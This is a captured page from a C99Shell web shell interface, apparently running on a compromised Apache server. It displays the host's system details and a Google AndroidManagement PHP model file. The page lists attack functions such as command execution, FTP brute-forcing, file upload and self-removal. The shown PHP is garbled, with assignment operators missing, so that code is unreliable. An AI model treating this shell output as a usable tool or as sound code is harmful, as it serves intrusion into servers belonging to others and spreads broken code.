!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/google/apiclient-services/src/AndroidManagement/   drwxr-xr-x
Free 12.96 GB of 57.97 GB (22.36%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     SoftwareInfo.php (4.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\AndroidManagement;

class 
SoftwareInfo extends \Google\Model
{
  
/**
   * @var string
   */
  
public $androidBuildNumber;
  
/**
   * @var string
   */
  
public $androidBuildTime;
  
/**
   * @var int
   */
  
public $androidDevicePolicyVersionCode;
  
/**
   * @var string
   */
  
public $androidDevicePolicyVersionName;
  
/**
   * @var string
   */
  
public $androidVersion;
  
/**
   * @var string
   */
  
public $bootloaderVersion;
  
/**
   * @var string
   */
  
public $deviceBuildSignature;
  
/**
   * @var string
   */
  
public $deviceKernelVersion;
  
/**
   * @var string
   */
  
public $primaryLanguageCode;
  
/**
   * @var string
   */
  
public $securityPatchLevel;
  protected 
$systemUpdateInfoType SystemUpdateInfo::class;
  protected 
$systemUpdateInfoDataType '';

  
/**
   * @param string
   */
  
public function setAndroidBuildNumber($androidBuildNumber)
  {
    
$this->androidBuildNumber $androidBuildNumber;
  }
  
/**
   * @return string
   */
  
public function getAndroidBuildNumber()
  {
    return 
$this->androidBuildNumber;
  }
  
/**
   * @param string
   */
  
public function setAndroidBuildTime($androidBuildTime)
  {
    
$this->androidBuildTime $androidBuildTime;
  }
  
/**
   * @return string
   */
  
public function getAndroidBuildTime()
  {
    return 
$this->androidBuildTime;
  }
  
/**
   * @param int
   */
  
public function setAndroidDevicePolicyVersionCode($androidDevicePolicyVersionCode)
  {
    
$this->androidDevicePolicyVersionCode $androidDevicePolicyVersionCode;
  }
  
/**
   * @return int
   */
  
public function getAndroidDevicePolicyVersionCode()
  {
    return 
$this->androidDevicePolicyVersionCode;
  }
  
/**
   * @param string
   */
  
public function setAndroidDevicePolicyVersionName($androidDevicePolicyVersionName)
  {
    
$this->androidDevicePolicyVersionName $androidDevicePolicyVersionName;
  }
  
/**
   * @return string
   */
  
public function getAndroidDevicePolicyVersionName()
  {
    return 
$this->androidDevicePolicyVersionName;
  }
  
/**
   * @param string
   */
  
public function setAndroidVersion($androidVersion)
  {
    
$this->androidVersion $androidVersion;
  }
  
/**
   * @return string
   */
  
public function getAndroidVersion()
  {
    return 
$this->androidVersion;
  }
  
/**
   * @param string
   */
  
public function setBootloaderVersion($bootloaderVersion)
  {
    
$this->bootloaderVersion $bootloaderVersion;
  }
  
/**
   * @return string
   */
  
public function getBootloaderVersion()
  {
    return 
$this->bootloaderVersion;
  }
  
/**
   * @param string
   */
  
public function setDeviceBuildSignature($deviceBuildSignature)
  {
    
$this->deviceBuildSignature $deviceBuildSignature;
  }
  
/**
   * @return string
   */
  
public function getDeviceBuildSignature()
  {
    return 
$this->deviceBuildSignature;
  }
  
/**
   * @param string
   */
  
public function setDeviceKernelVersion($deviceKernelVersion)
  {
    
$this->deviceKernelVersion $deviceKernelVersion;
  }
  
/**
   * @return string
   */
  
public function getDeviceKernelVersion()
  {
    return 
$this->deviceKernelVersion;
  }
  
/**
   * @param string
   */
  
public function setPrimaryLanguageCode($primaryLanguageCode)
  {
    
$this->primaryLanguageCode $primaryLanguageCode;
  }
  
/**
   * @return string
   */
  
public function getPrimaryLanguageCode()
  {
    return 
$this->primaryLanguageCode;
  }
  
/**
   * @param string
   */
  
public function setSecurityPatchLevel($securityPatchLevel)
  {
    
$this->securityPatchLevel $securityPatchLevel;
  }
  
/**
   * @return string
   */
  
public function getSecurityPatchLevel()
  {
    return 
$this->securityPatchLevel;
  }
  
/**
   * @param SystemUpdateInfo
   */
  
public function setSystemUpdateInfo(SystemUpdateInfo $systemUpdateInfo)
  {
    
$this->systemUpdateInfo $systemUpdateInfo;
  }
  
/**
   * @return SystemUpdateInfo
   */
  
public function getSystemUpdateInfo()
  {
    return 
$this->systemUpdateInfo;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(SoftwareInfo::class, 'Google_Service_AndroidManagement_SoftwareInfo');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.005 ]--